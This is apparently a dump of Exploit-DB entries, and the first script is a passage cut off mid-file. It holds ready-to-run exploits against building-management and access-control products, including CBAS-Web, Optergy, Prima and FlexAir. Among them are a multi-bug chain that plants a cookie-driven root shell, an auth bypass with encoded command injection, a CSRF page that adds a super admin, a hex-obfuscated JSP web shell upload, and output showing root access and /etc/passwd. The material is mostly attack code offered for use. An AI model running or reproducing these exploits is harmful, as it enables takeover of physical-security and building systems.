# shell is in the context of the lower privileged user called s2user
# but the user has sudo rights
# ========================= Vuln 5: Webserver runs as root
TEST_CMD=''
while read -p "${SPLOT_USERNAME}@${VULN_HOST}$ " TEST_CMD && [ "${TEST_CMD}" != "quit" ] ; do
curl -s -k -H "Cookie: sudo $TEST_CMD" ${VULN_HOST}/cgi-bin/websrunnings.cgi
echo ""
done
}
# ========================= Pre-exploit checks
# check connection
echo_green "Checking connection to the target.."
RESULT=`curl -sL -w "%{http_code}\\n" ${VULN_HOST} -o /dev/null --connect-timeout 3 --max-time 5`
if [ "$RESULT" != "200" ] ;
then
echo_red "Could not connect to ${VULN_HOST} :(" ;
exit
fi
echo_blue "We can connect to the server"
# check already infected
echo_green "Checking if already infected.."
RESULT=`curl -sL -w "%{http_code}\\n" ${VULN_HOST}/cgi-bin/websrunnings.cgi -o /dev/null --connect-timeout 3 --max-time 5`
if [ "$RESULT" == "200" ] ; then
echo_blue "Target already seems to be infected"
SPLOT_USERNAME=`curl -s -k -H "Cookie: sudo whoami" ${VULN_HOST}/cgi-bin/websrunnings.cgi`
echo_blue "Username found: ${SPLOT_USERNAME}"
read -p "Try shell directly? (Y/N)" TEST
if [ "$TEST" == "Y" ] ; then
echo_green "Trying direct shell.."
run_remote_shell
exit
fi
else
echo_blue "Target not yet infected.." ;
fi
# ========================= Vuln 1: Sys update CGI script allows unauthenticated upg-file upload
# Used to create file with the contents of a valid session file
# Session file required a timestamp from < 3600 seconds ago
# And a valid (remote) IP address
echo_green "Creating custom session file.."
# binary session file
SESS_FILE_BIN_PRE="MzEzMzc4MDA4NQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABTeXN0ZW0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEFkbWluaXN0cmF0b3IAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYWRtaW4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="
SESS_FILE_BIN_POST="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAQAAAAEAAAABAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQUkxUjVlYk1UWlhMOFZ1NlJ5aGNUdWF2dWFFYlp2eTkAAAAAYtPxW0o/71s="
# write session/backup file
printf $SESS_FILE_BIN_PRE | base64 -D > backup.upg
# write IP
MY_IP=`curl -s https://api.ipify.org`
printf ${MY_IP} >> backup.upg
printf $SESS_FILE_BIN_POST | base64 -D >> backup.upg
# replace timestamp
python -c "import struct,time,sys; sys.stdout.write(struct.pack('<i',int(time.time()+(3600*5))))" | dd of=backup.upg bs=1 seek=1080 count=4 conv=notrunc 2> /dev/null
# upload session as backup file
echo_green "Uploading custom session file.."
curl -s -F upload=@backup.upg ${VULN_HOST}/cgi-bin/uplsysupdate.cgi
# check if session file works
RESULT=`curl -s -w "%{http_code}\\n" --cookie ".sessionId=$SESSION_ID" ${VULN_HOST}/goform/foo -o /dev/null --connect-timeout 3 --max-time 5`
if [ "$RESULT" != "200" ] ; then
echo_red "Creating session file didn't seem to work :(" ;
exit
fi
echo_blue "Session file active!"
# ========================= Vuln 3: Image upload allows any file contents
# We use it to upload a shell script
# It will be run as root on startup
# get csrf token
echo_green "Retrieving CSRF token.."
CSRF_TOKEN=`curl -s --cookie ".sessionId=$SESSION_ID" ${VULN_HOST}/frameset/ | grep -E -o 'csrft = "(.*)"' | awk -F '"' '{print $2}'`
echo_blue "CSRF_TOKEN: $CSRF_TOKEN"
if [ -z "$CSRF_TOKEN" ]; then
echo_red "Could not get CSRF token :("
exit
fi
# prepare file
# this will run as root
echo "cp /usr/local/s2/web/cgi-bin/websrunning.cgi /usr/local/s2/web/cgi-bin/websrunnings.cgi" > shell.jpg
echo 'sed -i '"'"'s/echo "OK"/A=\`\$HTTP_COOKIE\`;printf "\$A"/'"'"' /usr/local/s2/web/cgi-bin/websrunnings.cgi' >> shell.jpg
# upload file
echo_green "Uploading file.."
RESULT=`curl -s --cookie ".sessionId=$SESSION_ID" \
-F "csrft=$CSRF_TOKEN" \
-F "person=31337" \
-F "file=@shell.jpg" \
${VULN_HOST}/person/upload/ | grep -o "File successfully uploaded"`
echo_blue $RESULT
if [[ ! "$RESULT" =~ "successfully" ]]; then
echo_red "Could not upload file :("
exit
fi
# ========================= Vuln 4: Config allows command injection
# Length is limited
# Also, no spaces allowed
# change config
# the file in the config file will be run as root at startup
echo_green "Writing new config.."
curl -s ${VULN_HOST}/goform/saveS2ConfVals --cookie ".sessionId=$SESSION_ID" --data "timeserver1=a.a%24%28bash%3C%2Fusr%2Flocal%2Fs2%2Fweb%2Fupload%2Fpics%2Fshell.jpg%29&timeserver2=&timeserver3=&timezone=America%2FChicago&save=Save&urlOk=cfgntp.asp&urlError=cfgntp.asp&okpage=cfgntp.asp" > /dev/null
echo_blue "Wrote new config, restarting device"
# restart device
RESULT=`curl -s --cookie ".sessionId=$SESSION_ID" ${VULN_HOST}/goform/restarts2Conf --data "changeNetwork=1" | grep -o "The proxy server could not handle the request"`
# this is supposed to get returned (device rebooting)
if [[ "$RESULT" =~ "could not handle the request" ]]; then
echo_green "Looks good! Waiting for device to reboot.."
sleep 20
echo_blue "Executing: whoami.."
SPLOT_USERNAME=`curl -s -k -H "Cookie: sudo whoami" ${VULN_HOST}/cgi-bin/websrunnings.cgi`
echo_blue "Username found: ${SPLOT_USERNAME}"
# cleanup
echo_green "Cleaning up uploaded files.."
echo_green "Removing fake backup file.."
RESULT=`curl -s -k -H "Cookie: sudo rm /usr/local/s2/web/upload/system/backup.upg" ${VULN_HOST}/cgi-bin/websrunnings.cgi`
echo_green "Removing shell script.."
RESULT=`curl -s -k -H "Cookie: sudo rm /usr/local/s2/web/upload/pics/shell.jpg" ${VULN_HOST}/cgi-bin/websrunnings.cgi`
echo_green "Files removed"
# start shell
echo ""
echo_green "If that worked, you can now execute commands via your cookie"
echo_green "The URL is: ${VULN_HOST}/cgi-bin/websrunnings.cgi"
echo_green "Or type commands below ('quit' to quit)"
echo ""
run_remote_shell
else
echo_red "Exploit failed :("
fi
exit

157
exploits/hardware/webapps/47627.py Executable file
View file

@ -0,0 +1,157 @@
# Exploit Title: CBAS-Web 19.0.0 - Remote Code Execution
# Google Dork: NA
# Date: 2019-11-11
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/
# Software Link: https://www.computrols.com/building-automation-software/
# Version: 19.0.0
# Tested on: NA
# CVE : N/A
# Advisory: https://applied-risk.com/resources/ar-2019-009
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
#!/usr/bin/env python
'''
Computrols CBAS-Web Unauthenticated Remote Command Injection Exploit
Affected versions: 19.0.0 and below
by Sipke Mellema, 2019
Uses two vulnerabilities for executing commands:
- An authorization bypass in the auth module (CVE-2019-10853)
- A code execution vulnerability in the json.php endpoint (CVE-2019-10854)
Example usage:
$ python CBASWeb_19_rce.py 192.168.1.250 "cat /var/www/cbas-19.0.0/includes/db.php"
------------==[CBAS Web v19 Remote Command Injection
[*] URL: http://192.168.1.250/
[*] Executing: cat /var/www/cbas-19.0.0/includes/db.php
[*] Cookie is authenticated
[*] Creating Python payload..
[*] Sending Python payload..
[*] Server says:
<?php
// Base functions for database access
// Expects a number of constants to be set. Set settings.php
// Only allow local access to the database for security purposes
if(defined('WINDOWS') && WINDOWS){
define('MYSQL_HOST', '192.168.1.2');
define('DB_USER', 'wauser');
define('DB_PASS', 'wapwstandard');
/*define('DB_USER', 'root');
define('DB_PASS', 'souper secrit');*/
...
'''
import requests
import sys
import base64 as b
import json
def debug_print(msg, level=0):
if level == 0:
print "[*] %s" % msg
if level == 1:
print "[-] %s" % msg
# Check parameters
if len(sys.argv) < 3:
print "Missing target parameter\n\n\tUsage: %s <IP or hostname> \"<cmd>\"" % __file__
exit(0)
print "------------==[CBAS Web v18 Remote Command Injection\n"
# Set host, cookie and URL
host = sys.argv[1]
cookies = {'PHPSESSID': 'comparemetoasummersday'}
url = "http://%s/" % host
debug_print("URL: %s" % url)
# Command to execute
# Only use single quotes in cmd pls
icmd = sys.argv[2]
if '"' in icmd:
debug_print("Please don't use double quotes in your command string", level = 1)
exit(0)
debug_print("Executing: %s" % icmd)
# URL for performing auth bypass by setting the auth cookie flag to true
auth_bypass_req = "cbas/index.php?m=auth&a=agg_post&code=test"
# URL for removing auth flag from cookie (for clean-up)
logout_sess_req = "cbas/index.php?m=auth&a=logout"
# URL for command injection and session validity checking
json_checks_req = "cbas/json.php"
# Perform logout
def do_logout():
requests.get(url + logout_sess_req, cookies = cookies)
# Check if out cookie has the authentication flag
def has_auth():
ret = requests.get(url + json_checks_req, cookies = cookies)
if ret.text == "Access Forbidden":
return False
return True
# Set auth flag on cookie
def set_auth():
requests.get(url + auth_bypass_req, cookies = cookies)
# =======================================================
# Perform auth bypass if not authenticated yet
if not has_auth():
debug_print("Cookie not yet authenticated")
debug_print("Setting auth flag on cookie via auth bypass..")
set_auth()
# Check if bypass failed
if not has_auth():
debug_print("Was not able to perform authorization bypass :(")
debug_print("Exploit failed, quitting..", level = 1)
exit(0)
else:
debug_print("Cookie is authenticated")
debug_print("Creating Python payload..")
# Payload has to be encoded because the server uses the following filtering in exectools.php:
# $bad = array("..", "\\", "&", "|", ";", '/', '>', '<');
# So no slashes, etc. This means only two "'layers' of quotes"
# Create python code exec code
cmd_python = 'import os; os.system("%s")' % icmd
# Convert to Python array
cmd_array_string = str([ord(x) for x in cmd_python])
# Create command injection string
p_unencoded = "DispatchHistoryQuery\t-i \"$(python -c 'exec(chr(0)[0:0].join([chr(x) for x in %s]))')\"" % cmd_array_string
# Base64 encode for p parameter
p_encoded = b.b64encode(p_unencoded)
# Execute command
debug_print("Sending Python payload..")
ret = requests.post(url + json_checks_req, cookies = cookies, data = {'p': p_encoded})
# Parse result
ret_parsed = json.loads(ret.text)
try:
metadata = ret_parsed["metadata"]
identifier = metadata["identifier"]
debug_print("Server says:")
print identifier
# JSON Parsing error
except:
debug_print("Error parsing result from server :(", level = 1)
# Uncomment if you want the cookie to be removed after use
# debug_print("Logging out")
# do_logout()

30
exploits/hardware/webapps/47628.txt Normal file
View file

@ -0,0 +1,30 @@
# Exploit Title: CBAS-Web 19.0.0 - Cross-Site Request Forgery (Add Super Admin)
# Google Dork: NA
# Date: 2019-11-11
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/
# Software Link: https://www.computrols.com/building-automation-software/
# Version: 19.0.0
# Tested on: NA
# CVE : CVE-2019-10847
# Advisory: https://applied-risk.com/resources/ar-2019-009
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
<!-- CSRF Add Super Admin -->
<html>
<body>
<script>history.pushState('', 't00t', 'index.php')</script>
<form action="http://192.168.1.250/cbas/index.php?m=users&a=user_add_p" method="POST">
<input type="hidden" name="username_" value="Sooper" />
<input type="hidden" name="first" value="Mess" />
<input type="hidden" name="last" value="O'Bradovich" />
<input type="hidden" name="email" value="aa@bb.cc" />
<input type="hidden" name="password_" value="" />
<input type="hidden" name="notes" value="CSRFed" />
<input type="hidden" name="group_id" value="0" />
<input type="hidden" name="role" value="super" />
<input type="hidden" name="md5password" value="179edfe73d9c016b51e9dc77ae0eebb1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

35
exploits/hardware/webapps/47630.txt Normal file
View file

@ -0,0 +1,35 @@
# Exploit Title: CBAS-Web 19.0.0 - Username Enumeration
# Google Dork: NA
# Date: 2019-11-11
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/
# Software Link: https://www.computrols.com/building-automation-software/
# Version: 19.0.0
# Tested on: NA
# CVE : CVE-2019-10848
# Advisory: https://applied-risk.com/resources/ar-2019-009
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
# Testing for non-valid user:
POST /cbas/index.php?m=auth&a=login HTTP/1.1
username=randomuser&password=&challenge=60753c1b5e449de80e21472b5911594d&response=e16371917371b8b70529737813840c62
# Response for non-valid user:
<!-- Failed login comments appear here -->
<p class="alert-error">randomuser</p>
========================================================================
Testing for valid user:
POST /cbas/index.php?m=auth&a=login HTTP/1.1
username=admin&password=&challenge=6e4344e7ac62520dba82d7f20ccbd422&response=e09aab669572a8e4576206d5c14befc5s
# Response for valid user:
<!-- Failed login comments appear here -->
<p class="alert-error">Invalid username/password combination. Please try again!</p>

51
exploits/hardware/webapps/47634.txt Normal file
View file

@ -0,0 +1,51 @@
# Exploit Title: Prima Access Control 2.3.35 - Arbitrary File Upload
# Google Dork: NA
# Date: 2019-11-11
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/
# Software Link: https://www.computrols.com/building-automation-software/
# Version: 2.3.35
# Tested on: NA
# CVE : CVE-2019-9189
# Advisory: https://applied-risk.com/resources/ar-2019-007
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
# Prima Access Control 2.3.35 Authenticated Stored XSS
# PoC
---
POST /bin/sysfcgi.fx HTTP/1.1
Host: 192.168.13.37
Connection: keep-alive
Content-Length: 572
Origin: https://192.168.13.37
Session-ID: 5682699
User-Agent: Mozi-Mozi/44.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/html, */*; q=0.01
Session-Pc: 2
X-Requested-With: XMLHttpRequest
Referer: https://192.168.13.37/app/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: G_ENABLED_IDPS=google
<requests><request name="PythonScriptUpload"><param name="DestinationHwID" value="1"/><param name="FileName" value="test_python.py"/><param name="Content" value="#!/usr/bin/python&#xA;#&#xA;# test script&#xA;#&#xA;&#xA;import sys,os&#xA;&#xA;with open("/etc/passwd") as f:&#xA; with open("/www/pages/app/images/logos/testingus2.txt", "w") as f1:&#xA; for line in f:&#xA; f1.write(line)&#xA;&#xA;&#xA;os.system("id;uname -a >> /www/pages/app/images/logos/testingus2.txt")"/></request></requests>
Result:
$ curl https://192.168.13.37/app/images/logos/testingus2.txt
root:x:0:0:root:/home/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/bin/false
bin:x:2:2:bin:/bin:/bin/false
sys:x:3:3:sys:/dev:/bin/false
sync:x:4:100:sync:/bin:/bin/sync
mail:x:8:8:mail:/var/spool/mail:/bin/false
www-data:x:33:33:www-data:/var/www:/bin/false
operator:x:37:37:Operator:/var:/bin/false
nobody:x:99:99:nobody:/home:/bin/false
python:x:1000:1000:python:/home/python:/bin/false
admin:x:1001:1001:Linux User,,,:/home/admin:/bin/sh
uid=0(root) gid=0(root) groups=0(root),10(wheel)
Linux DemoMaster214 4.4.16 #1 Mon Aug 29 13:29:40 CEST 2016 armv7l GNU/Linux

174
exploits/hardware/webapps/47636.txt Normal file
View file

@ -0,0 +1,174 @@
# Title: Optergy 2.3.0a - Remote Code Execution
# Author: LiquidWorm
# Date: 2019-11-05
# Vendor: https://optergy.com/
# Product web page: https://optergy.com/products/
# Affected version: <=2.3.0a
# Advisory: https://applied-risk.com/resources/ar-2019-008
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
# CVE: CVE-2019-7274
#!/usr/bin/env python
# -*- coding: utf8 -*-
#
##########################################################################
#
# lqwrm@metalgear:~/stuff/optergy$ python optergy_rfm.py
# [+] Usage: optergy_rfm.py http://IP
# [+] Example: optergy_rfm.py http://10.0.0.17
#
# lqwrm@metalgear:~/stuff/optergy$ python optergy_rfm.py http://192.168.232.19
# Enter username: podroom
# Enter password: podroom
#
# Welcome to Optergy HTTP Shell!
# You can navigate to: http://192.168.232.19/images/jox.jsp
# Or you can continue using this 'shell'.
# Type 'exit' for exit.
#
# root@192.168.232.19:~# id
# uid=1000(optergy) gid=1000(optergy) groups=1000(optergy),4(adm)
# root@192.168.232.19:~# sudo id
# uid=0(root) gid=0(root) groups=0(root)
# root@192.168.232.19:~# rm /usr/local/tomcat/webapps/ROOT/images/jox.jsp
#
# root@192.168.232.19:~# exit
# Have a nice day!
#
##########################################################################
import requests
import sys,os,time,re
piton = os.path.basename(sys.argv[0])
if len(sys.argv) < 2:
print "[+] Usage: " + piton + " http://IP"
print "[+] Example: " + piton + " http://10.0.0.17\n"
sys.exit()
the_user = raw_input("Enter username: ")
the_pass = raw_input("Enter password: ")
the_host = sys.argv[1]
odi = requests.Session()
the_url = the_host + "/ajax/AjaxLogin.html?login"
the_headers = {"Accept" : "*/*",
"X-Requested-With" : "XMLHttpRequest",
"User-Agent" : "Noproblem/16.0",
"Content-Type" : "application/x-www-form-urlencoded",
"Accept-Encoding" : "gzip, deflate",
"Accept-Language" : "en-US,en;q=0.9"}
the_data = {"username" : the_user,
"password" : the_pass,
"token" : ''}
odi.post(the_url, headers = the_headers, data = the_data)
the_upl = ("\x2f\x61\x6a\x61\x78\x2f\x46\x69\x6c\x65\x55\x70\x6c\x6f\x61\x64"
"\x65\x72\x2e\x68\x74\x6d\x6c\x3f\x69\x64\x54\x6f\x55\x73\x65\x3d"
"\x61\x74\x74\x61\x63\x68\x6d\x65\x6e\x74\x2d\x31\x35\x34\x36\x30"
"\x30\x32\x33\x36\x39\x39\x33\x39\x26\x64\x65\x63\x6f\x6d\x70\x72"
"\x65\x73\x73\x3d\x66\x61\x6c\x73\x65\x26\x6f\x75\x74\x70\x75\x74"
"\x4c\x6f\x63\x61\x74\x69\x6f\x6e\x3d\x25\x32\x46\x75\x73\x72\x25"
"\x32\x46\x6c\x6f\x63\x61\x6c\x25\x32\x46\x74\x6f\x6d\x63\x61\x74"
"\x25\x32\x46\x77\x65\x62\x61\x70\x70\x73\x25\x32\x46\x52\x4f\x4f"
"\x54\x25\x32\x46\x69\x6d\x61\x67\x65\x73\x25\x32\x46\x26\x66\x69"
"\x6c\x65\x4e\x61\x6d\x65\x3d\x6a\x6f\x78\x2e\x6a\x73\x70")######"
the_url = the_host + the_upl
the_headers = {"Cache-Control" : "max-age=0",
"Content-Type" : "multipart/form-data; boundary=----WebKitFormBoundarysrMvKmQPYUODSWBl",
"User-Agent" : "Noproblem/16.0",
"Accept" : "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
"Accept-Encoding" : "gzip, deflate",
"Accept-Language" : "en-US,en;q=0.9"}
the_data = ("\x2d\x2d\x2d\x2d\x2d\x2d\x57\x65\x62\x4b\x69\x74\x46\x6f\x72\x6d"
"\x42\x6f\x75\x6e\x64\x61\x72\x79\x73\x72\x4d\x76\x4b\x6d\x51\x50"
"\x59\x55\x4f\x44\x53\x57\x42\x6c\x0d\x0a\x43\x6f\x6e\x74\x65\x6e"
"\x74\x2d\x44\x69\x73\x70\x6f\x73\x69\x74\x69\x6f\x6e\x3a\x20\x66"
"\x6f\x72\x6d\x2d\x64\x61\x74\x61\x3b\x20\x6e\x61\x6d\x65\x3d\x22"
"\x61\x74\x74\x61\x63\x68\x6d\x65\x6e\x74\x2d\x31\x35\x34\x36\x30"
"\x30\x32\x33\x36\x39\x39\x33\x39\x22\x3b\x20\x66\x69\x6c\x65\x6e"
"\x61\x6d\x65\x3d\x22\x6a\x6f\x78\x2e\x6a\x73\x70\x22\x0d\x0a\x43"
"\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x61\x70\x70"
"\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6f\x63\x74\x65\x74\x2d\x73"
"\x74\x72\x65\x61\x6d\x0d\x0a\x0d\x0a\x3c\x25\x40\x20\x70\x61\x67"
"\x65\x20\x69\x6d\x70\x6f\x72\x74\x3d\x22\x6a\x61\x76\x61\x2e\x75"
"\x74\x69\x6c\x2e\x2a\x2c\x6a\x61\x76\x61\x2e\x69\x6f\x2e\x2a\x22"
"\x25\x3e\x0a\x3c\x48\x54\x4d\x4c\x3e\x3c\x42\x4f\x44\x59\x3e\x0a"
"\x3c\x46\x4f\x52\x4d\x20\x4d\x45\x54\x48\x4f\x44\x3d\x22\x47\x45"
"\x54\x22\x20\x4e\x41\x4d\x45\x3d\x22\x6d\x79\x66\x6f\x72\x6d\x22"
"\x20\x41\x43\x54\x49\x4f\x4e\x3d\x22\x22\x3e\x0a\x3c\x49\x4e\x50"
"\x55\x54\x20\x54\x59\x50\x45\x3d\x22\x74\x65\x78\x74\x22\x20\x4e"
"\x41\x4d\x45\x3d\x22\x63\x6d\x64\x22\x3e\x0a\x3c\x49\x4e\x50\x55"
"\x54\x20\x54\x59\x50\x45\x3d\x22\x73\x75\x62\x6d\x69\x74\x22\x20"
"\x56\x41\x4c\x55\x45\x3d\x22\x53\x65\x6e\x64\x22\x3e\x0a\x3c\x2f"
"\x46\x4f\x52\x4d\x3e\x0a\x3c\x70\x72\x65\x3e\x0a\x3c\x25\x0a\x69"
"\x66\x20\x28\x72\x65\x71\x75\x65\x73\x74\x2e\x67\x65\x74\x50\x61"
"\x72\x61\x6d\x65\x74\x65\x72\x28\x22\x63\x6d\x64\x22\x29\x20\x21"
"\x3d\x20\x6e\x75\x6c\x6c\x29\x20\x7b\x0a\x20\x20\x20\x20\x20\x20"
"\x20\x20\x6f\x75\x74\x2e\x70\x72\x69\x6e\x74\x6c\x6e\x28\x22\x43"
"\x6f\x6d\x6d\x61\x6e\x64\x3a\x20\x22\x20\x2b\x20\x72\x65\x71\x75"
"\x65\x73\x74\x2e\x67\x65\x74\x50\x61\x72\x61\x6d\x65\x74\x65\x72"
"\x28\x22\x63\x6d\x64\x22\x29\x20\x2b\x20\x22\x3c\x42\x52\x3e\x22"
"\x29\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x50\x72\x6f\x63\x65"
"\x73\x73\x20\x70\x20\x3d\x20\x52\x75\x6e\x74\x69\x6d\x65\x2e\x67"
"\x65\x74\x52\x75\x6e\x74\x69\x6d\x65\x28\x29\x2e\x65\x78\x65\x63"
"\x28\x72\x65\x71\x75\x65\x73\x74\x2e\x67\x65\x74\x50\x61\x72\x61"
"\x6d\x65\x74\x65\x72\x28\x22\x63\x6d\x64\x22\x29\x29\x3b\x0a\x20"
"\x20\x20\x20\x20\x20\x20\x20\x4f\x75\x74\x70\x75\x74\x53\x74\x72"
"\x65\x61\x6d\x20\x6f\x73\x20\x3d\x20\x70\x2e\x67\x65\x74\x4f\x75"
"\x74\x70\x75\x74\x53\x74\x72\x65\x61\x6d\x28\x29\x3b\x0a\x20\x20"
"\x20\x20\x20\x20\x20\x20\x49\x6e\x70\x75\x74\x53\x74\x72\x65\x61"
"\x6d\x20\x69\x6e\x20\x3d\x20\x70\x2e\x67\x65\x74\x49\x6e\x70\x75"
"\x74\x53\x74\x72\x65\x61\x6d\x28\x29\x3b\x0a\x20\x20\x20\x20\x20"
"\x20\x20\x20\x44\x61\x74\x61\x49\x6e\x70\x75\x74\x53\x74\x72\x65"
"\x61\x6d\x20\x64\x69\x73\x20\x3d\x20\x6e\x65\x77\x20\x44\x61\x74"
"\x61\x49\x6e\x70\x75\x74\x53\x74\x72\x65\x61\x6d\x28\x69\x6e\x29"
"\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x53\x74\x72\x69\x6e\x67"
"\x20\x64\x69\x73\x72\x20\x3d\x20\x64\x69\x73\x2e\x72\x65\x61\x64"
"\x4c\x69\x6e\x65\x28\x29\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20"
"\x77\x68\x69\x6c\x65\x20\x28\x20\x64\x69\x73\x72\x20\x21\x3d\x20"
"\x6e\x75\x6c\x6c\x20\x29\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20"
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6f\x75\x74\x2e\x70\x72\x69"
"\x6e\x74\x6c\x6e\x28\x64\x69\x73\x72\x29\x3b\x20\x0a\x20\x20\x20"
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x64\x69\x73"
"\x72\x20\x3d\x20\x64\x69\x73\x2e\x72\x65\x61\x64\x4c\x69\x6e\x65"
"\x28\x29\x3b\x20\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x20\x20\x20\x20\x20\x7d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x7d"
"\x0a\x25\x3e\x0a\x3c\x2f\x70\x72\x65\x3e\x0a\x3c\x2f\x42\x4f\x44"
"\x59\x3e\x3c\x2f\x48\x54\x4d\x4c\x3e\x0a\x0a\x0a\x0d\x0a\x2d\x2d"
"\x2d\x2d\x2d\x2d\x57\x65\x62\x4b\x69\x74\x46\x6f\x72\x6d\x42\x6f"
"\x75\x6e\x64\x61\x72\x79\x73\x72\x4d\x76\x4b\x6d\x51\x50\x59\x55"
"\x4f\x44\x53\x57\x42\x6c\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d"
"\x44\x69\x73\x70\x6f\x73\x69\x74\x69\x6f\x6e\x3a\x20\x66\x6f\x72"
"\x6d\x2d\x64\x61\x74\x61\x3b\x20\x6e\x61\x6d\x65\x3d\x22\x75\x70"
"\x6c\x6f\x61\x64\x22\x0d\x0a\x0d\x0a\x55\x70\x6c\x6f\x61\x64\x0d"
"\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x57\x65\x62\x4b\x69\x74\x46\x6f\x72"
"\x6d\x42\x6f\x75\x6e\x64\x61\x72\x79\x73\x72\x4d\x76\x4b\x6d\x51"
"\x50\x59\x55\x4f\x44\x53\x57\x42\x6c\x2d\x2d\x0d\x0a")##########"
odi.post(the_url, headers = the_headers, data = the_data)
print "\nWelcome to Optergy HTTP Shell!"
print "You can navigate to: " + the_host + "/images/jox.jsp"
print "Or you can continue using this 'shell'."
print "Type 'exit' for exit.\n"
while True:
try:
cmd = raw_input("root@" + the_host[7:] + ":~# ")
if cmd.strip() == "exit":
print "Have a nice day!"
break
paramz = {"cmd" : cmd} # sudo cmd
shell = requests.get(url = the_host + "/images/jox.jsp", params = paramz)
regex = re.search(r"BR>(.*?)</pre>", shell.text, flags = re.S)
print regex.group(1).strip()
except Exception:
break
sys.exit()

57
exploits/hardware/webapps/47638.sh Executable file
View file

@ -0,0 +1,57 @@
# Exploit Title: FlexAir Access Control 2.4.9api3 - Remote Code Execution
# Google Dork: NA
# Date: 2019-11-11
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/
# Software Link: https://www.computrols.com/building-automation-software/
# Version: 2.4.9api3
# Tested on: NA
# CVE : CVE-2019-9189
# Advisory: https://applied-risk.com/resources/ar-2019-007
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
# PoC
#!/bin/bash
#
# Command injection with root privileges in FlexAir Access Control (Prima Systems)
# Firmware version: <= 2.3.38
#
# Discovered by Sipke Mellema
# Updated: 14.01.2019
#
##########################################################################
#
# $ ./Nova2.3.38_cmd.sh 192.168.13.37 "id"
# Executing: id
# Output:
# uid=0(root) gid=0(root) groups=0(root),10(wheel)
# Removing temporary file..
# Done
#
##########################################################################
# Output file on the server
OUTPUT_FILE="/www/pages/app/images/logos/output.txt"
# Command to execute
CMD="$2"
# IP address
IP="$1"
# Change HTTP to HTTPS if required
HOST="http://${IP}"
# Add output file
CMD_FULL="${CMD}>${OUTPUT_FILE}"
# Command injection payload. Be careful with single quotes!
PAYLOAD="<requests><request name='LoginUser'><param name='UsrName' value='test'/><param name='UsrEMail' value='test@test.com'/><param name='GoogleAccessToken' value='test;${CMD_FULL}'/></request></requests>"
# Perform exploit
echo "Executing: ${CMD}"
